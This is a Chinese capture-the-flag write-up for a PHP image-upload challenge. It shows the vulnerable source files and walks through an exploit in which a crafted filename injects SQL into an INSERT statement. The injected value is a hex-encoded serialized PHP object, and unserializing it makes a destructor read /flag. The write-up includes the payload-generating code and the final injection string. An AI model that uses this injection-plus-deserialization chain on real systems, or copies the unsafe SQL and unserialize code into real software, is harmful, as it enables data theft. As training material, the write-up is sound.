进入靶场

解题过程

点击最下面的英文字即可上传图片

新建一个文本文档

里面内容为空

更改名字为

1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#.png

知道id=1，一般id是get方式传参，在url处补充?id=1

点击最下面的英文句子

看到flag

源码

upload.php

<!DOCTYPE html>
<html>
<head><!-- 设置网页的标题，会显示在浏览器的标签页上 --><title>Image Upload</title><!-- 引入外部的 CSS 样式表，用于美化页面 --><link rel="stylesheet" href="./style.css"><!-- 设置网页的字符编码为 UTF - 8，确保页面能正确显示各种字符 --><meta http-equiv="content-type" content="text/html;charset=UTF-8"/>
</head>
<body><!-- 使用 p 标签并设置居中对齐，展示一张图片，图片的宽度为 300，注意这里 length 属性使用有误，应为 height --><p align="center"><img src="https://i.loli.net/2019/10/06/i5GVSYnB1mZRaFj.png" width=300 height=150></p><!-- 使用 div 标签将表单居中显示 --><div align="center"><!-- 创建一个名为 upload 的表单，表单提交的目标地址为空（表示提交到当前页面），使用 POST 方法，enctype 设置为 multipart/form - data 用于上传文件 --><form name="upload" action=""  method="post" enctype ="multipart/form-data" ><!-- 创建一个文件选择框，用户可以通过此选择要上传的文件 --><input type="file" name="file"><!-- 创建一个提交按钮，按钮上显示的文字为 submit --><input type="Submit" value="submit"></form></div><!-- 插入一个换行符 --><br> <!-- 创建一个链接，点击后会跳转到 show.php 页面，提示用户可以在此查看上传的图片 --><p><a href="./show.php">You can view the pictures you uploaded here</a></p><!-- 插入一个换行符 --><br><?php// 包含 helper.php 文件，该文件可能包含了一些辅助函数或类的定义include("./helper.php");// 定义一个名为 upload 的类，继承自 helper 类class upload extends helper {// 定义一个公共方法 upload_base，用于调用父类的 upload 方法public function upload_base(){$this->upload();}}// 检查 $_FILES 数组是否存在（即是否有文件被上传）if ($_FILES){// 检查上传文件是否有错误if ($_FILES["file"]["error"]){// 如果有错误，终止脚本并输出上传失败的提示信息die("Upload file failed.");}else{// 如果没有错误，创建一个 upload 类的实例$file = new upload();// 调用 upload_base 方法来处理文件上传$file->upload_base();}}// 创建一个 helper 类的实例，这里创建实例但未使用，可能后续代码会用到$a = new helper();?>
</body>
</html>

show.php

<!DOCTYPE html>
<html>
<head><!-- 设置页面标题，会显示在浏览器标签栏 --><title>Show Images</title><!-- 引入外部 CSS 样式表，用于美化页面 --><link rel="stylesheet" href="./style.css"><!-- 设置页面的字符编码为 UTF - 8，确保正确显示各种字符 --><meta http-equiv="content-type" content="text/html;charset=UTF-8"/>
</head>
<body><!-- 显示一个居中对齐的二级标题 --><h2 align="center">Your images</h2><!-- 显示一段提示信息，告知用户查看图片功能未完成，目前仅保存图片名称 --><p>The function of viewing the image has not been completed, and currently only the contents of your image name can be saved. I hope you can forgive me and my colleagues and I are working hard to improve.</p><!-- 插入一条水平线 --><hr><?php// 包含 helper.php 文件，可能包含一些辅助函数或类include("./helper.php");// 创建 show 类的一个实例$show = new show();// 检查 URL 参数中是否有 delete_allif($_GET["delete_all"]){// 检查 delete_all 参数的值是否为 trueif($_GET["delete_all"] == "true"){// 调用 show 类的 Delete_All_Images 方法删除所有图片记录$show->Delete_All_Images();}}// 调用 show 类的 Get_All_Images 方法获取并显示所有图片信息$show->Get_All_Images();// 定义 show 类，用于处理图片显示和删除操作class show{// 定义一个公共属性 $con，用于存储数据库连接对象public $con;// 构造函数，在创建类的实例时自动调用public function __construct(){// 连接到 MySQL 数据库，指定主机、用户名、密码和数据库名$this->con = mysqli_connect("127.0.0.1","r00t","r00t","pic_base");// 检查数据库连接是否失败if (mysqli_connect_errno($this->con)){ // 如果连接失败，终止脚本并输出错误信息die("Connect MySQL Fail:".mysqli_connect_error());}}// 定义 Get_All_Images 方法，用于获取并显示所有图片信息public function Get_All_Images(){// 定义 SQL 查询语句，用于从 images 表中选取所有记录$sql = "SELECT * FROM images";// 执行 SQL 查询，并将结果存储在 $result 变量中$result = mysqli_query($this->con, $sql);// 检查查询结果中是否有记录if ($result->num_rows > 0){// 如果有记录，逐行遍历结果集while($row = $result->fetch_assoc()){// 检查图片的 attr 字段是否有值if($row["attr"]){// 对 attr 字段的值进行处理，将 \0\0\0 替换为 \0*\0$attr_temp = str_replace('\0\0\0', chr(0).'*'.chr(0), $row["attr"]);// 对处理后的 attr 字段值进行反序列化$attr = unserialize($attr_temp);}// 输出图片的 id、文件名和路径信息echo "<p>id=".$row["id"]." filename=".$row["filename"]." path=".$row["path"]."</p>";}} else {// 如果没有记录，输出提示信息echo "<p>You have not uploaded an image yet.</p>";}// 关闭数据库连接mysqli_close($this->con);}// 定义 Delete_All_Images 方法，用于删除 images 表中的所有记录public function Delete_All_Images(){// 定义 SQL 删除语句，用于删除 images 表中的所有记录$sql = "DELETE FROM images";// 执行 SQL 删除语句$result = mysqli_query($this->con, $sql);}}?><!-- 创建一个链接，点击后会调用 Delete_All_Images 方法删除所有图片记录 --><p><a href="show.php?delete_all=true">Delete All Images</a></p><!-- 创建一个链接，点击后跳转到 upload.php 页面进行图片上传 --><p><a href="upload.php">Upload Images</a></p></body>
</html>

helper.php

<?php
// 定义一个名为 helper 的类，该类包含了处理图片上传、文件检查、数据保存等功能的方法
class helper {// 定义一个受保护的属性 $folder，用于指定图片上传后的存储文件夹protected $folder = "pic/";// 定义一个受保护的属性 $ifview，用于控制查看文件功能是否开启，初始值为 Falseprotected $ifview = False; // 定义一个受保护的属性 $config，用于指定配置文件的名称protected $config = "config.txt";// 注释提示查看文件功能尚未完善，暂未开放/*** 处理文件上传的方法* @param string $input 上传文件的表单字段名，默认为 "file"*/public function upload($input = "file"){// 调用 getfile 方法获取上传文件的信息$fileinfo = $this->getfile($input);// 初始化一个空数组，用于存储文件相关信息$array = array();// 将文件的标题信息存入数组$array["title"] = $fileinfo['title'];// 将文件名信息存入数组$array["filename"] = $fileinfo['filename'];// 将文件扩展名信息存入数组$array["ext"] = $fileinfo['ext'];// 将文件存储路径信息存入数组$array["path"] = $fileinfo['path'];// 获取上传图片的尺寸信息$img_ext = getimagesize($_FILES[$input]["tmp_name"]);// 提取图片的宽度和高度信息存入新数组$my_ext = array("width" => $img_ext[0], "height" => $img_ext[1]);// 对图片尺寸信息进行序列化处理，并存入数组$array["attr"] = serialize($my_ext);// 调用 save 方法将文件信息保存到数据库，并获取保存后的记录 ID$id = $this->save($array);// 检查保存操作是否成功，如果 ID 为 0 则表示出现问题，终止程序并输出错误信息if ($id == 0) {die("Something wrong!");}// 输出换行符echo "<br>";// 输出文件上传成功的提示信息，并显示文件记录的 IDecho "<p>Your images is uploaded successfully. And your image's id is $id.</p>";}/*** 获取上传文件信息的方法* @param string $input 上传文件的表单字段名* @return array 包含文件标题、文件名、扩展名和存储路径的数组*/public function getfile($input){// 检查输入的表单字段名是否存在if (isset($input)) {// 调用 check 方法对上传的文件信息进行检查和处理$rs = $this->check($_FILES[$input]);}// 返回处理后的文件信息数组return $rs;}/*** 检查上传文件的方法* @param array $info 上传文件的信息数组* @return array 包含处理后文件标题、文件名、扩展名和存储路径的数组*/public function check($info){// 生成一个唯一的文件名前缀，使用时间戳和唯一 ID 进行 MD5 加密后截取部分字符$basename = substr(md5(time() . uniqid()), 9, 16);// 获取上传文件的原始文件名$filename = $info["name"];// 提取文件的扩展名$ext = substr(strrchr($filename, '.'), 1);// 定义允许上传的图片文件扩展名数组$cate_exts = array("jpg", "gif", "png", "jpeg");// 检查上传文件的扩展名是否在允许的扩展名数组中if (!in_array($ext, $cate_exts)) {// 如果不在允许范围内，终止程序并输出错误提示信息die("<p>Please upload the correct image file!!!</p>");}// 去除文件名中的扩展名，得到文件标题$title = str_replace("." . $ext, '', $filename);// 返回包含文件标题、处理后的文件名、扩展名和存储路径的数组return array('title' => $title, 'filename' => $basename . "." . $ext, 'ext' => $ext, 'path' => $this->folder . $basename . "." . $ext);}/*** 保存文件信息到数据库的方法* @param array $data 包含文件信息的数组* @return int 保存记录的 ID*/public function save($data){// 检查传入的数据是否为空或不是数组类型if (!$data || !is_array($data)) {// 如果不符合要求，终止程序并输出错误信息die("Something wrong!");}// 调用 insert_array 方法将数据插入数据库，并获取插入记录的 ID$id = $this->insert_array($data);// 返回插入记录的 IDreturn $id;}/*** 将数组数据插入数据库的方法* @param array $data 包含文件信息的数组* @return int 插入记录的 ID*/public function insert_array($data){// 连接到 MySQL 数据库，指定主机、用户名、密码和数据库名$con = mysqli_connect("127.0.0.1", "r00t", "r00t", "pic_base");// 检查数据库连接是否失败if (mysqli_connect_errno($con)) {// 如果连接失败，终止程序并输出错误信息die("Connect MySQL Fail:" . mysqli_connect_error());}// 初始化一个空数组，用于存储 SQL 语句中的字段名$sql_fields = array();// 初始化一个空数组，用于存储 SQL 语句中的字段值$sql_val = array();// 遍历传入的数据数组foreach ($data as $key => $value) {// 对字段名进行处理，将特定字符替换为 \0\0\0$key_temp = str_replace(chr(0) . '*' . chr(0), '\0\0\0', $key);// 对字段值进行处理，将特定字符替换为 \0\0\0$value_temp = str_replace(chr(0) . '*' . chr(0), '\0\0\0', $value);// 将处理后的字段名添加到字段名数组中，并添加反引号$sql_fields[] = "`" . $key_temp . "`";// 将处理后的字段值添加到字段值数组中，并添加单引号$sql_val[] = "'" . $value_temp . "'";}// 构建插入数据的 SQL 语句$sql = "INSERT INTO images (" . (implode(",", $sql_fields)) . ") VALUES(" . (implode(",", $sql_val)) . ")";// 执行 SQL 插入语句mysqli_query($con, $sql);// 获取插入记录的 ID$id = mysqli_insert_id($con);// 关闭数据库连接mysqli_close($con);// 返回插入记录的 IDreturn $id;}/*** 查看文件内容的方法* @param string $path 文件的路径* @return bool|void 如果查看功能未开启，返回 False；否则输出文件内容*/public function view_files($path){// 检查查看功能是否开启if ($this->ifview == False) {// 如果未开启，返回 Falsereturn False;}// 读取指定路径文件的内容$content = file_get_contents($path);// 输出文件内容echo $content;}/*** 析构函数，在对象销毁时调用*/function __destruct(){// 注释提示会读取一些配置 HTML 文件// 调用 view_files 方法读取配置文件内容$this->view_files($this->config);}
}?>

解题思路

由于 $array 数组中有 title、filename、ext、path、attr 这 5 个键 - 值对，所以在遍历过程中，$sql_fields 数组就会对应生成 5 个列名（即 title、filename、ext、path、attr 处理后的形式），$sql_val 数组也会对应生成 5 个值，以满足构建 INSERT INTO 语句时列名和对应插入值数量匹配的要求，这样才能正确地将数据插入到 images 表中。

show.php会进行反序列化

而attr存储的是图片的宽度和高度

payload

<?php
class helper {protected $ifview = True; protected $config = "/flag";
}
$a = new helper();
echo serialize($a);
?>

O:6:"helper":2:{s:9:" * ifview";b:1;s:9:" * config";s:5:"/flag";}

文件名中不能有双引号，所以将payload进行16进制编码 

string = 'O:6:"helper":2:{s:9:" * ifview";b:1;s:9:" * config";s:5:"/flag";}'
hex_encoded = string.encode('utf - 8').hex()
print(hex_encoded)

得到4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d

最后用#注释掉值，防止报错

1','2','3','4',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#.png